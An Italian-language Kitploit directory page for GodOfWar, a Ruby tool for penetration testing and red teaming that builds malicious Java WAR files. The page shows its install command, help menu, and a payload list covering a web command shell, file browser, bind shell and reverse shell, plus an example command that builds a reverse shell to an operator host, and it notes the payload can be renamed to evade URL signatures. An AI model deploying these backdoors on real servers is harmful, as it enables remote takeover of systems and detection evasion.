Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
godofwar — GodOfWar - Costruttore Java WAR malevolo con payload integrati | Kitploit
Strumenti/GitHubGitHub/kingsabri/godofwar
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubkingsabri/godofwar

godofwar

GodOfWar - Costruttore Java WAR malevolo con payload integrati

Vedi Repository
125347 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

GodOfWar - Costruttore WAR Java malevolo

Uno strumento da riga di comando per generare payload war per scopi di penetration testing / red teaming, scritto in ruby.

root@kitploit:~
                              .
                             hhh              
                            hhhhhhh           
                           hhhhhhhh        
                          hhhhhhhh+        
                         hhhhhhhh'           
                        hhhhhhhh.            
                       hhhhhhhhh             
        ..--          hhhhhhhhh             
      -sh/..  +.     hhhhhhhhh:              
      /+/:-/+ss-`   hhhhhhhhhh:               
      /MMM`ss:``.`  hhhhhhhhhh:              
     .MMMMM:        hhhhhhhhhhhhhhhhh:       
     MMMMMMM:        hhhhhhhhhhhhhhhh:      
     MMMMMMMMMMMMM:  hhhhhhhhhhhhhhhh`       
    :NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`       
   ./:`smdo+oos++-    `++sNMMMMMNmh+         
      .-y-`     ` :.  /   -dmddhhhhh-        
       o/-     `//o/ /M/   `+hhhhhhhh`       
      /o     :yosmy   +y  .`.hhhhhhhho       
      +`     /../.:      `.y::hhhhhs:`       
       `      `+yys`   .sy` /oohhy:          
                `/:s/-``     `.hh`           
               ..`     `       y+            
            .hNNmmNdymmmmds`   :-            
            hs.   ``..    :y-  `             
               -hhmNmddm+   .                
               `NMMMMMMm                     
                ` `oMMy                      
            `.     /Md-      :o  
           MMMMMMMMMMMMMMMMMMM:             
            MMMMMMMMMMMMMMMMMM:              
             MMMMMMMMMMMMMMMMM               
              MMMMMMMMMMMMMMM.               
              `MMMMMMMMMMMMM.                 
                :sNMMMNMdo:                  
                  ``+m:/-                    
                     `                                  
GodOfWar - Costruttore WAR Java malevolo.

Caratteristiche

  • Payload preesistenti. (prova -l/--list)
    • cmd_get
    • filebrowser
    • bind_shell
    • reverse_shell
    • reverse_shell_ui
  • Backdoor configurabile. (prova --host/--port)
  • Controllo sul nome del payload.
    • Per evitare nomi malevoli dopo il deploy e aggirare le firme URL.

Installazione

root@kitploit:~
$ gem install godofwar

Utilizzo

root@kitploit:~
$ godofwar -h 

Menù di aiuto:
   -p, --payload PAYLOAD            Genera un war da uno dei payload disponibili.
                                        (controlla -l/--list)
   -H, --host IP_ADDR               Indirizzo IP locale o remoto per il payload scelto
                                        (usato con -p/--payload)
   -P, --port PORT                  Porta locale o remota per il payload scelto
                                        (usato con -p/--payload)
   -o, --output [FILE]              File di output e nome del deploy.
                                        (default è il nome originale del payload. controlla '-l/--list')
   -l, --list                       elenca tutti i payload disponibili.
   -h, --help                       Mostra questo messaggio di aiuto.

Esempio

Elenca tutti i payload

root@kitploit:~
$ godofwar -l
├── cmd_get
│   └── Informazioni:
│       ├── Descrizione: Esecuzione comandi tramite interfaccia web
│       ├── OS:          qualsiasi
│       ├── Impostazioni:    {"false"=>"Nessuna impostazione richiesta!"}
│       ├── Utilizzo:       http://host/cmd.jsp?cmd=whoami
│       ├── Riferimenti:  ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│       └── Percorso locale:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│   └── Informazioni:
│       ├── Descrizione: Browser di file remoto, carica, scarica, decomprime file ed esecuzione nativa di comandi
│       ├── OS:          qualsiasi
│       ├── Impostazioni:    {"false"=>"Nessuna impostazione richiesta!"}
│       ├── Utilizzo:       http://host/filebrowser.jsp
│       ├── Riferimenti:  ["http://www.vonloesch.de/filebrowser.html"]
│       └── Percorso locale:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│   └── Informazioni:
│       ├── Descrizione: Shell TCP bind
│       ├── OS:          qualsiasi
│       ├── Impostazioni:    {"port"=>4444, "false"=>"Nessuna impostazione richiesta!"}
│       ├── Utilizzo:       http://host/reverse-shell.jsp
│       ├── Riferimenti:  ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│       └── Percorso locale:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│   └── Informazioni:
│       ├── Descrizione: Shell TCP reverse con un form HTML per impostare LHOST e LPORT dal browser.
│       ├── OS:          qualsiasi
│       ├── Impostazioni:    {"host"=>"attacker", "port"=>4444, "false"=>"Nessuna impostazione richiesta!"}
│       ├── Utilizzo:       http://host/reverse_shell_ui.jsp
│       ├── Riferimenti:  []
│       └── Percorso locale:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│   └── Informazioni:
│       ├── Descrizione: Shell TCP reverse. LHOST e LPORT sono hardcoded
│       ├── OS:          qualsiasi
│       ├── Impostazioni:    {"host"=>"attacker", "port"=>4444, "false"=>"Nessuna impostazione richiesta!"}
│       ├── Utilizzo:       http://host/reverse_shell.jsp
│       ├── Riferimenti:  []
│       └── Percorso locale:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell

Genera payload con LHOST e LPORT

root@kitploit:~
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy

Dopo il deploy, puoi visitare la tua shell su (http://host:8080/puppy/puppy.jsp)

Contribuire

  1. Fai un fork ( https://github.com/KINGSABRI/godofwar/fork ).
  2. Crea il tuo branch per la funzionalità (git checkout -b my-new-feature).
  3. Effettua i commit delle modifiche (git commit -am 'Aggiungi una funzionalità').
  4. Invia il branch (git push origin my-new-feature).
  5. Crea una nuova Pull Request.

Aggiungere più backdoor

Per contribuire aggiungendo altre backdoor:

  1. crea una nuova cartella nella directory payloads.
  2. inserisci il tuo file jsp nella directory appena creata (usa lo stesso nome della directory).
  3. aggiorna il file payloads_info.json con
    1. descrizione.
    2. sistema operativo supportato (cerca di renderlo universale).
    3. configurazioni: host e porta predefiniti.
    4. riferimenti: la provenienza del payload o i crediti del suo creatore.

Licenza

La gemma è disponibile come open source secondo i termini della Licenza MIT.

Scarica lo strumento